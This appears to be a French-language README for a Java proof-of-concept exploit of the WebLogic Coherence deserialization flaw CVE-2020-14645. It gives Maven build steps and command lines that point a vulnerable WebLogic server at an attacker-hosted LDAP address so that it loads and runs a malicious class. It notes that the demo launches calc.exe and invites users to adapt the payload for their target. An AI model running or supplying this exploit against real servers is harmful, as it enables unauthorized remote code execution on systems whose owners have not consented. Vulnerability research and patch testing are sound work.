
PoC Java pour la désérialisation RCE de WebLogic CVE-2020-14645 Coherence. Héberge une classe malveillante via LDAP et déclenche l'exécution de code à distance sur les serveurs WebLogic vulnérables.
Maven 3
JDK 1.8
mvn package
Étapes de test spécifiques :
Comme cette vulnérabilité est similaire à celle d'Apache Dubbo, veuillez vous référer à cette vulnérabilité pour réaliser les étapes 1-4.
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL
# Exemple
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002
Si vous utilisez le POC fourni dans cet exemple, la cible testée exécutera calc.exe après une exploitation réussie. Veuillez modifier le POC vous-même en fonction de l'environnement de la cible de test.
Ce projet fait référence et cite une partie du code des projets @Y4er et @5up3rc, avec nos remerciements !